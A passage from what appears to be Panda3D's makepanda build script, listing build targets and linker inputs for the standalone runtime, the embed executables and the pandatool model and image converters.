TargetAdd('panda3d.exe', input='plugin_standalone_panda3d.obj')
TargetAdd('panda3d.exe', input='plugin_standalone_panda3dMain.obj')
TargetAdd('panda3d.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('panda3d.exe', input='plugin_common.obj')
TargetAdd('panda3d.exe', input='plugin_wstring_encode.obj')
if GetTarget() == 'darwin':
TargetAdd('panda3d.exe', input='plugin_find_root_dir_assist.obj')
elif GetTarget() == 'windows':
TargetAdd('panda3d.exe', input='panda3d.res')
TargetAdd('panda3d.exe', input='libpandaexpress.dll')
TargetAdd('panda3d.exe', input='libp3dtoolconfig.dll')
TargetAdd('panda3d.exe', input='libp3dtool.dll')
#TargetAdd('panda3d.exe', input='libp3pystub.lib')
TargetAdd('panda3d.exe', input='libp3tinyxml.ilb')
TargetAdd('panda3d.exe', opts=['NOICON', 'OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'WINSHELL', 'ADVAPI', 'WINSOCK2', 'WINOLE', 'CARBON'])
if (GetTarget() == 'darwin'):
TargetAdd('plugin_standalone_panda3dMac.obj', opts=OPTS, input='panda3dMac.cxx')
TargetAdd('Panda3D.app', input='plugin_standalone_panda3d.obj')
TargetAdd('Panda3D.app', input='plugin_standalone_panda3dMac.obj')
TargetAdd('Panda3D.app', input='plugin_standalone_panda3dBase.obj')
TargetAdd('Panda3D.app', input='plugin_common.obj')
TargetAdd('Panda3D.app', input='plugin_find_root_dir_assist.obj')
TargetAdd('Panda3D.app', input='libpandaexpress.dll')
TargetAdd('Panda3D.app', input='libp3dtoolconfig.dll')
TargetAdd('Panda3D.app', input='libp3dtool.dll')
#TargetAdd('Panda3D.app', input='libp3pystub.lib')
TargetAdd('Panda3D.app', input='libp3tinyxml.ilb')
TargetAdd('Panda3D.app', input='panda3d_mac.plist', ipath=OPTS)
TargetAdd('Panda3D.app', input='models/plugin_images/panda3d.icns')
TargetAdd('Panda3D.app', opts=['OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'WINSHELL', 'ADVAPI', 'WINSOCK2', 'WINOLE', 'CARBON'])
elif (GetTarget() == 'windows'):
TargetAdd('plugin_standalone_panda3dWinMain.obj', opts=OPTS, input='panda3dWinMain.cxx')
TargetAdd('panda3dw.exe', input='plugin_standalone_panda3d.obj')
TargetAdd('panda3dw.exe', input='plugin_standalone_panda3dWinMain.obj')
TargetAdd('panda3dw.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('panda3dw.exe', input='plugin_wstring_encode.obj')
TargetAdd('panda3dw.exe', input='plugin_common.obj')
TargetAdd('panda3dw.exe', input='libpandaexpress.dll')
TargetAdd('panda3dw.exe', input='libp3dtoolconfig.dll')
TargetAdd('panda3dw.exe', input='libp3dtool.dll')
#TargetAdd('panda3dw.exe', input='libp3pystub.lib')
TargetAdd('panda3dw.exe', input='libp3tinyxml.ilb')
TargetAdd('panda3dw.exe', opts=['SUBSYSTEM:WINDOWS', 'OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'WINSHELL', 'ADVAPI', 'WINSOCK2', 'WINOLE', 'CARBON'])
if (RTDIST):
OPTS=['BUILDING:P3D_PLUGIN', 'DIR:direct/src/plugin_standalone', 'DIR:direct/src/plugin', 'DIR:dtool/src/dtoolbase', 'DIR:dtool/src/dtoolutil', 'DIR:dtool/src/pystub', 'DIR:dtool/src/prc', 'DIR:dtool/src/dconfig', 'DIR:panda/src/express', 'DIR:panda/src/downloader', 'RUNTIME', 'P3DEMBED', 'OPENSSL', 'ZLIB']
# This is arguably a big fat ugly hack, but doing it otherwise would complicate the build process considerably.
DefSymbol("P3DEMBED", "LINK_ALL_STATIC", "")
TargetAdd('plugin_standalone_panda3dBase.obj', opts=OPTS, input='panda3dBase.cxx')
TargetAdd('plugin_standalone_p3dEmbedMain.obj', opts=OPTS, input='p3dEmbedMain.cxx')
TargetAdd('plugin_standalone_p3dEmbed.obj', opts=OPTS, input='p3dEmbed.cxx')
#TargetAdd('plugin_standalone_pystub.obj', opts=OPTS, input='pystub.cxx')
TargetAdd('plugin_standalone_dtoolbase_composite1.obj', opts=OPTS, input='p3dtoolbase_composite1.cxx')
TargetAdd('plugin_standalone_dtoolbase_composite2.obj', opts=OPTS, input='p3dtoolbase_composite2.cxx')
TargetAdd('plugin_standalone_lookup3.obj', opts=OPTS, input='lookup3.c')
TargetAdd('plugin_standalone_indent.obj', opts=OPTS, input='indent.cxx')
TargetAdd('plugin_standalone_dtoolutil_composite1.obj', opts=OPTS, input='p3dtoolutil_composite1.cxx')
TargetAdd('plugin_standalone_dtoolutil_composite2.obj', opts=OPTS, input='p3dtoolutil_composite2.cxx')
if (GetTarget() == 'darwin'):
TargetAdd('plugin_standalone_dtoolutil_filename_assist.obj', opts=OPTS, input='filename_assist.mm')
TargetAdd('plugin_standalone_prc_composite1.obj', opts=OPTS, input='p3prc_composite1.cxx')
TargetAdd('plugin_standalone_prc_composite2.obj', opts=OPTS, input='p3prc_composite2.cxx')
TargetAdd('plugin_standalone_dconfig_composite1.obj', opts=OPTS, input='p3dconfig_composite1.cxx')
TargetAdd('plugin_standalone_express_composite1.obj', opts=OPTS, input='p3express_composite1.cxx')
TargetAdd('plugin_standalone_express_composite2.obj', opts=OPTS, input='p3express_composite2.cxx')
TargetAdd('plugin_standalone_downloader_composite1.obj', opts=OPTS, input='p3downloader_composite1.cxx')
TargetAdd('plugin_standalone_downloader_composite2.obj', opts=OPTS, input='p3downloader_composite2.cxx')
TargetAdd('p3dembed.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_p3dEmbedMain.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_p3dEmbed.obj')
#TargetAdd('p3dembed.exe', input='plugin_standalone_pystub.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolbase_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolbase_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_lookup3.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_indent.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolutil_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolutil_composite2.obj')
if GetTarget() == 'darwin':
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolutil_filename_assist.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_prc_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_prc_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dconfig_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_express_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_express_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_downloader_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_downloader_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_common.obj')
if GetTarget() == 'darwin':
TargetAdd('p3dembed.exe', input='plugin_find_root_dir_assist.obj')
TargetAdd('p3dembed.exe', input='libp3subprocbuffer.ilb')
TargetAdd('p3dembed.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dembed.exe', input='libp3d_plugin_static.ilb')
TargetAdd('p3dembed.exe', opts=['NOICON', 'WINGDI', 'WINSOCK2', 'ZLIB', 'WINUSER', 'OPENSSL', 'WINOLE', 'CARBON', 'MSIMG', 'WINCOMCTL', 'ADVAPI', 'WINSHELL', 'X11'])
if GetTarget() == 'windows':
OPTS.append("P3DEMBEDW")
DefSymbol("P3DEMBEDW", "P3DEMBEDW", "")
TargetAdd('plugin_standalone_p3dEmbedWinMain.obj', opts=OPTS, input='p3dEmbedMain.cxx')
TargetAdd('p3dembedw.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_p3dEmbedWinMain.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_p3dEmbed.obj')
#TargetAdd('p3dembedw.exe', input='plugin_standalone_pystub.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolbase_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolbase_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_lookup3.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_indent.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolutil_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolutil_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_prc_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_prc_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dconfig_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_express_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_express_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_downloader_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_downloader_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_common.obj')
TargetAdd('p3dembedw.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dembedw.exe', input='libp3d_plugin_static.ilb')
TargetAdd('p3dembedw.exe', opts=['SUBSYSTEM:WINDOWS', 'NOICON', 'WINGDI', 'WINSOCK2', 'ZLIB', 'WINUSER', 'OPENSSL', 'WINOLE', 'MSIMG', 'WINCOMCTL', 'ADVAPI', 'WINSHELL'])
#
# DIRECTORY: pandatool/src/pandatoolbase/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/pandatoolbase']
TargetAdd('p3pandatoolbase_composite1.obj', opts=OPTS, input='p3pandatoolbase_composite1.cxx')
TargetAdd('libp3pandatoolbase.lib', input='p3pandatoolbase_composite1.obj')
#
# DIRECTORY: pandatool/src/converter/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/converter']
TargetAdd('p3converter_somethingToEggConverter.obj', opts=OPTS, input='somethingToEggConverter.cxx')
TargetAdd('p3converter_eggToSomethingConverter.obj', opts=OPTS, input='eggToSomethingConverter.cxx')
TargetAdd('libp3converter.lib', input='p3converter_somethingToEggConverter.obj')
TargetAdd('libp3converter.lib', input='p3converter_eggToSomethingConverter.obj')
#
# DIRECTORY: pandatool/src/progbase/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/progbase', 'ZLIB']
TargetAdd('p3progbase_composite1.obj', opts=OPTS, input='p3progbase_composite1.cxx')
TargetAdd('libp3progbase.lib', input='p3progbase_composite1.obj')
#
# DIRECTORY: pandatool/src/eggbase/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/eggbase']
TargetAdd('p3eggbase_composite1.obj', opts=OPTS, input='p3eggbase_composite1.cxx')
TargetAdd('libp3eggbase.lib', input='p3eggbase_composite1.obj')
#
# DIRECTORY: pandatool/src/bam/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/bam']
TargetAdd('bam-info_bamInfo.obj', opts=OPTS, input='bamInfo.cxx')
TargetAdd('bam-info.exe', input='bam-info_bamInfo.obj')
TargetAdd('bam-info.exe', input='libp3progbase.lib')
TargetAdd('bam-info.exe', input='libp3pandatoolbase.lib')
TargetAdd('bam-info.exe', input=COMMON_PANDA_LIBS)
TargetAdd('bam-info.exe', opts=['ADVAPI', 'FFTW'])
if not PkgSkip("EGG"):
TargetAdd('bam2egg_bamToEgg.obj', opts=OPTS, input='bamToEgg.cxx')
TargetAdd('bam2egg.exe', input='bam2egg_bamToEgg.obj')
TargetAdd('bam2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('bam2egg.exe', opts=['ADVAPI', 'FFTW'])
TargetAdd('egg2bam_eggToBam.obj', opts=OPTS, input='eggToBam.cxx')
TargetAdd('egg2bam.exe', input='egg2bam_eggToBam.obj')
TargetAdd('egg2bam.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2bam.exe', opts=['ADVAPI', 'FFTW'])
#
# DIRECTORY: pandatool/src/cvscopy/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/cvscopy']
TargetAdd('p3cvscopy_composite1.obj', opts=OPTS, input='p3cvscopy_composite1.cxx')
TargetAdd('libp3cvscopy.lib', input='p3cvscopy_composite1.obj')
#
# DIRECTORY: pandatool/src/daeegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("FCOLLADA") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/daeegg', 'FCOLLADA']
TargetAdd('p3daeegg_composite1.obj', opts=OPTS, input='p3daeegg_composite1.cxx')
TargetAdd('libp3daeegg.lib', input='p3daeegg_composite1.obj')
TargetAdd('libp3daeegg.lib', opts=['FCOLLADA', 'CARBON'])
#
# DIRECTORY: pandatool/src/assimp
#
if not PkgSkip("PANDATOOL") and not PkgSkip("ASSIMP"):
OPTS=['DIR:pandatool/src/assimp', 'BUILDING:ASSIMP', 'ASSIMP', 'MODULE']
TargetAdd('p3assimp_composite1.obj', opts=OPTS, input='p3assimp_composite1.cxx')
TargetAdd('libp3assimp.dll', input='p3assimp_composite1.obj')
TargetAdd('libp3assimp.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3assimp.dll', opts=OPTS+['ZLIB'])
#
# DIRECTORY: pandatool/src/daeprogs/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("FCOLLADA") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/daeprogs', 'FCOLLADA']
TargetAdd('dae2egg_daeToEgg.obj', opts=OPTS, input='daeToEgg.cxx')
TargetAdd('dae2egg.exe', input='dae2egg_daeToEgg.obj')
TargetAdd('dae2egg.exe', input='libp3daeegg.lib')
TargetAdd('dae2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('dae2egg.exe', opts=['WINUSER', 'FCOLLADA', 'CARBON'])
#
# DIRECTORY: pandatool/src/dxf/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/dxf']
TargetAdd('p3dxf_composite1.obj', opts=OPTS, input='p3dxf_composite1.cxx')
TargetAdd('libp3dxf.lib', input='p3dxf_composite1.obj')
#
# DIRECTORY: pandatool/src/dxfegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/dxfegg']
TargetAdd('p3dxfegg_dxfToEggConverter.obj', opts=OPTS, input='dxfToEggConverter.cxx')
TargetAdd('p3dxfegg_dxfToEggLayer.obj', opts=OPTS, input='dxfToEggLayer.cxx')
TargetAdd('libp3dxfegg.lib', input='p3dxfegg_dxfToEggConverter.obj')
TargetAdd('libp3dxfegg.lib', input='p3dxfegg_dxfToEggLayer.obj')
#
# DIRECTORY: pandatool/src/dxfprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/dxfprogs']
TargetAdd('dxf-points_dxfPoints.obj', opts=OPTS, input='dxfPoints.cxx')
TargetAdd('dxf-points.exe', input='dxf-points_dxfPoints.obj')
TargetAdd('dxf-points.exe', input='libp3progbase.lib')
TargetAdd('dxf-points.exe', input='libp3dxf.lib')
TargetAdd('dxf-points.exe', input='libp3pandatoolbase.lib')
TargetAdd('dxf-points.exe', input=COMMON_PANDA_LIBS)
TargetAdd('dxf-points.exe', opts=['ADVAPI', 'FFTW'])
if not PkgSkip("EGG"):
TargetAdd('dxf2egg_dxfToEgg.obj', opts=OPTS, input='dxfToEgg.cxx')
TargetAdd('dxf2egg.exe', input='dxf2egg_dxfToEgg.obj')
TargetAdd('dxf2egg.exe', input='libp3dxfegg.lib')
TargetAdd('dxf2egg.exe', input='libp3dxf.lib')
TargetAdd('dxf2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('dxf2egg.exe', opts=['ADVAPI', 'FFTW'])
TargetAdd('egg2dxf_eggToDXF.obj', opts=OPTS, input='eggToDXF.cxx')
TargetAdd('egg2dxf_eggToDXFLayer.obj', opts=OPTS, input='eggToDXFLayer.cxx')
TargetAdd('egg2dxf.exe', input='egg2dxf_eggToDXF.obj')
TargetAdd('egg2dxf.exe', input='egg2dxf_eggToDXFLayer.obj')
TargetAdd('egg2dxf.exe', input='libp3dxf.lib')
TargetAdd('egg2dxf.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2dxf.exe', opts=['ADVAPI', 'FFTW'])
#
# DIRECTORY: pandatool/src/objegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/objegg']
TargetAdd('p3objegg_objToEggConverter.obj', opts=OPTS, input='objToEggConverter.cxx')
TargetAdd('p3objegg_eggToObjConverter.obj', opts=OPTS, input='eggToObjConverter.cxx')
TargetAdd('p3objegg_config_objegg.obj', opts=OPTS, input='config_objegg.cxx')
TargetAdd('libp3objegg.lib', input='p3objegg_objToEggConverter.obj')
TargetAdd('libp3objegg.lib', input='p3objegg_eggToObjConverter.obj')
TargetAdd('libp3objegg.lib', input='p3objegg_config_objegg.obj')
#
# DIRECTORY: pandatool/src/objprogs/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/objprogs']
TargetAdd('obj2egg_objToEgg.obj', opts=OPTS, input='objToEgg.cxx')
TargetAdd('obj2egg.exe', input='obj2egg_objToEgg.obj')
TargetAdd('obj2egg.exe', input='libp3objegg.lib')
TargetAdd('obj2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2obj_eggToObj.obj', opts=OPTS, input='eggToObj.cxx')
TargetAdd('egg2obj.exe', input='egg2obj_eggToObj.obj')
TargetAdd('egg2obj.exe', input='libp3objegg.lib')
TargetAdd('egg2obj.exe', input=COMMON_EGG2X_LIBS)
#
# DIRECTORY: pandatool/src/palettizer/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/palettizer']
TargetAdd('p3palettizer_composite1.obj', opts=OPTS, input='p3palettizer_composite1.cxx')
TargetAdd('libp3palettizer.lib', input='p3palettizer_composite1.obj')
#
# DIRECTORY: pandatool/src/egg-mkfont/
#
if not PkgSkip("FREETYPE") and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-mkfont', 'DIR:pandatool/src/palettizer', 'FREETYPE']
TargetAdd('egg-mkfont_eggMakeFont.obj', opts=OPTS, input='eggMakeFont.cxx')
TargetAdd('egg-mkfont_rangeDescription.obj', opts=OPTS, input='rangeDescription.cxx')
TargetAdd('egg-mkfont_rangeIterator.obj', opts=OPTS, input='rangeIterator.cxx')
TargetAdd('egg-mkfont.exe', input='egg-mkfont_eggMakeFont.obj')
TargetAdd('egg-mkfont.exe', input='egg-mkfont_rangeDescription.obj')
TargetAdd('egg-mkfont.exe', input='egg-mkfont_rangeIterator.obj')
TargetAdd('egg-mkfont.exe', input='libp3palettizer.lib')
TargetAdd('egg-mkfont.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-mkfont.exe', opts=['ADVAPI', 'FREETYPE'])
#
# DIRECTORY: pandatool/src/eggcharbase/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/eggcharbase', 'ZLIB']
TargetAdd('p3eggcharbase_composite1.obj', opts=OPTS, input='p3eggcharbase_composite1.cxx')
TargetAdd('libp3eggcharbase.lib', input='p3eggcharbase_composite1.obj')
#
# DIRECTORY: pandatool/src/egg-optchar/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-optchar']
TargetAdd('egg-optchar_config_egg_optchar.obj', opts=OPTS, input='config_egg_optchar.cxx')
TargetAdd('egg-optchar_eggOptchar.obj', opts=OPTS, input='eggOptchar.cxx')
TargetAdd('egg-optchar_eggOptcharUserData.obj', opts=OPTS, input='eggOptcharUserData.cxx')
TargetAdd('egg-optchar_vertexMembership.obj', opts=OPTS, input='vertexMembership.cxx')
TargetAdd('egg-optchar.exe', input='egg-optchar_config_egg_optchar.obj')
TargetAdd('egg-optchar.exe', input='egg-optchar_eggOptchar.obj')
TargetAdd('egg-optchar.exe', input='egg-optchar_eggOptcharUserData.obj')
TargetAdd('egg-optchar.exe', input='egg-optchar_vertexMembership.obj')
TargetAdd('egg-optchar.exe', input='libp3eggcharbase.lib')
TargetAdd('egg-optchar.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-optchar.exe', opts=['ADVAPI', 'FREETYPE'])
#
# DIRECTORY: pandatool/src/egg-palettize/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-palettize', 'DIR:pandatool/src/palettizer']
TargetAdd('egg-palettize_eggPalettize.obj', opts=OPTS, input='eggPalettize.cxx')
TargetAdd('egg-palettize.exe', input='egg-palettize_eggPalettize.obj')
TargetAdd('egg-palettize.exe', input='libp3palettizer.lib')
TargetAdd('egg-palettize.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-palettize.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/egg-qtess/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-qtess']
TargetAdd('egg-qtess_composite1.obj', opts=OPTS, input='egg-qtess_composite1.cxx')
TargetAdd('egg-qtess.exe', input='egg-qtess_composite1.obj')
TargetAdd('egg-qtess.exe', input='libp3eggbase.lib')
TargetAdd('egg-qtess.exe', input='libp3progbase.lib')
TargetAdd('egg-qtess.exe', input='libp3converter.lib')
TargetAdd('egg-qtess.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-qtess.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/eggprogs/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/eggprogs']
TargetAdd('egg-crop_eggCrop.obj', opts=OPTS, input='eggCrop.cxx')
TargetAdd('egg-crop.exe', input='egg-crop_eggCrop.obj')
TargetAdd('egg-crop.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-crop.exe', opts=['ADVAPI'])
TargetAdd('egg-make-tube_eggMakeTube.obj', opts=OPTS, input='eggMakeTube.cxx')
TargetAdd('egg-make-tube.exe', input='egg-make-tube_eggMakeTube.obj')
TargetAdd('egg-make-tube.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-make-tube.exe', opts=['ADVAPI'])
TargetAdd('egg-texture-cards_eggTextureCards.obj', opts=OPTS, input='eggTextureCards.cxx')
TargetAdd('egg-texture-cards.exe', input='egg-texture-cards_eggTextureCards.obj')
TargetAdd('egg-texture-cards.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-texture-cards.exe', opts=['ADVAPI'])
TargetAdd('egg-topstrip_eggTopstrip.obj', opts=OPTS, input='eggTopstrip.cxx')
TargetAdd('egg-topstrip.exe', input='egg-topstrip_eggTopstrip.obj')
TargetAdd('egg-topstrip.exe', input='libp3eggcharbase.lib')
TargetAdd('egg-topstrip.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-topstrip.exe', opts=['ADVAPI'])
TargetAdd('egg-trans_eggTrans.obj', opts=OPTS, input='eggTrans.cxx')
TargetAdd('egg-trans.exe', input='egg-trans_eggTrans.obj')
TargetAdd('egg-trans.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-trans.exe', opts=['ADVAPI'])
TargetAdd('egg2c_eggToC.obj', opts=OPTS, input='eggToC.cxx')
TargetAdd('egg2c.exe', input='egg2c_eggToC.obj')
TargetAdd('egg2c.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2c.exe', opts=['ADVAPI'])
TargetAdd('egg-rename_eggRename.obj', opts=OPTS, input='eggRename.cxx')
TargetAdd('egg-rename.exe', input='egg-rename_eggRename.obj')
TargetAdd('egg-rename.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-rename.exe', opts=['ADVAPI'])
TargetAdd('egg-retarget-anim_eggRetargetAnim.obj', opts=OPTS, input='eggRetargetAnim.cxx')
TargetAdd('egg-retarget-anim.exe', input='egg-retarget-anim_eggRetargetAnim.obj')
TargetAdd('egg-retarget-anim.exe', input='libp3eggcharbase.lib')
TargetAdd('egg-retarget-anim.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-retarget-anim.exe', opts=['ADVAPI'])
TargetAdd('egg-list-textures_eggListTextures.obj', opts=OPTS, input='eggListTextures.cxx')
TargetAdd('egg-list-textures.exe', input='egg-list-textures_eggListTextures.obj')
TargetAdd('egg-list-textures.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-list-textures.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/flt/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/flt', 'ZLIB']
TargetAdd('p3flt_composite1.obj', opts=OPTS, input='p3flt_composite1.cxx')
TargetAdd('libp3flt.lib', input=['p3flt_composite1.obj'])
#
# DIRECTORY: pandatool/src/fltegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/fltegg']
TargetAdd('p3fltegg_fltToEggConverter.obj', opts=OPTS, input='fltToEggConverter.cxx')
TargetAdd('p3fltegg_fltToEggLevelState.obj', opts=OPTS, input='fltToEggLevelState.cxx')
TargetAdd('libp3fltegg.lib', input=['p3fltegg_fltToEggConverter.obj', 'p3fltegg_fltToEggLevelState.obj'])
#
# DIRECTORY: pandatool/src/fltprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/fltprogs', 'DIR:pandatool/src/flt', 'DIR:pandatool/src/cvscopy']
TargetAdd('flt-info_fltInfo.obj', opts=OPTS, input='fltInfo.cxx')
TargetAdd('flt-info.exe', input='flt-info_fltInfo.obj')
TargetAdd('flt-info.exe', input='libp3flt.lib')
TargetAdd('flt-info.exe', input='libp3progbase.lib')
TargetAdd('flt-info.exe', input='libp3pandatoolbase.lib')
TargetAdd('flt-info.exe', input=COMMON_PANDA_LIBS)
TargetAdd('flt-info.exe', opts=['ADVAPI'])
TargetAdd('flt-trans_fltTrans.obj', opts=OPTS, input='fltTrans.cxx')
TargetAdd('flt-trans.exe', input='flt-trans_fltTrans.obj')
TargetAdd('flt-trans.exe', input='libp3flt.lib')
TargetAdd('flt-trans.exe', input='libp3progbase.lib')
TargetAdd('flt-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('flt-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('flt-trans.exe', opts=['ADVAPI'])
TargetAdd('fltcopy_fltCopy.obj', opts=OPTS, input='fltCopy.cxx')
TargetAdd('fltcopy.exe', input='fltcopy_fltCopy.obj')
TargetAdd('fltcopy.exe', input='libp3cvscopy.lib')
TargetAdd('fltcopy.exe', input='libp3flt.lib')
TargetAdd('fltcopy.exe', input='libp3progbase.lib')
TargetAdd('fltcopy.exe', input='libp3pandatoolbase.lib')
TargetAdd('fltcopy.exe', input=COMMON_PANDA_LIBS)
TargetAdd('fltcopy.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('egg2flt_eggToFlt.obj', opts=OPTS, input='eggToFlt.cxx')
TargetAdd('egg2flt.exe', input='egg2flt_eggToFlt.obj')
TargetAdd('egg2flt.exe', input='libp3flt.lib')
TargetAdd('egg2flt.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2flt.exe', opts=['ADVAPI'])
TargetAdd('flt2egg_fltToEgg.obj', opts=OPTS, input='fltToEgg.cxx')
TargetAdd('flt2egg.exe', input='flt2egg_fltToEgg.obj')
TargetAdd('flt2egg.exe', input='libp3flt.lib')
TargetAdd('flt2egg.exe', input='libp3fltegg.lib')
TargetAdd('flt2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('flt2egg.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/imagebase/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/imagebase']
TargetAdd('p3imagebase_composite1.obj', opts=OPTS, input='p3imagebase_composite1.cxx')
TargetAdd('libp3imagebase.lib', input='p3imagebase_composite1.obj')
#
# DIRECTORY: pandatool/src/imageprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/imageprogs']
TargetAdd('image-info_imageInfo.obj', opts=OPTS, input='imageInfo.cxx')
TargetAdd('image-info.exe', input='image-info_imageInfo.obj')
TargetAdd('image-info.exe', input='libp3imagebase.lib')
TargetAdd('image-info.exe', input='libp3progbase.lib')
TargetAdd('image-info.exe', input='libp3pandatoolbase.lib')
TargetAdd('image-info.exe', input=COMMON_PANDA_LIBS)
TargetAdd('image-info.exe', opts=['ADVAPI'])
TargetAdd('image-resize_imageResize.obj', opts=OPTS, input='imageResize.cxx')
TargetAdd('image-resize.exe', input='image-resize_imageResize.obj')
TargetAdd('image-resize.exe', input='libp3imagebase.lib')
TargetAdd('image-resize.exe', input='libp3progbase.lib')
TargetAdd('image-resize.exe', input='libp3pandatoolbase.lib')
TargetAdd('image-resize.exe', input=COMMON_PANDA_LIBS)
TargetAdd('image-resize.exe', opts=['ADVAPI'])
TargetAdd('image-trans_imageTrans.obj', opts=OPTS, input='imageTrans.cxx')
TargetAdd('image-trans.exe', input='image-trans_imageTrans.obj')
TargetAdd('image-trans.exe', input='libp3imagebase.lib')
TargetAdd('image-trans.exe', input='libp3progbase.lib')
TargetAdd('image-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('image-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('image-trans.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/pfmprogs/
#
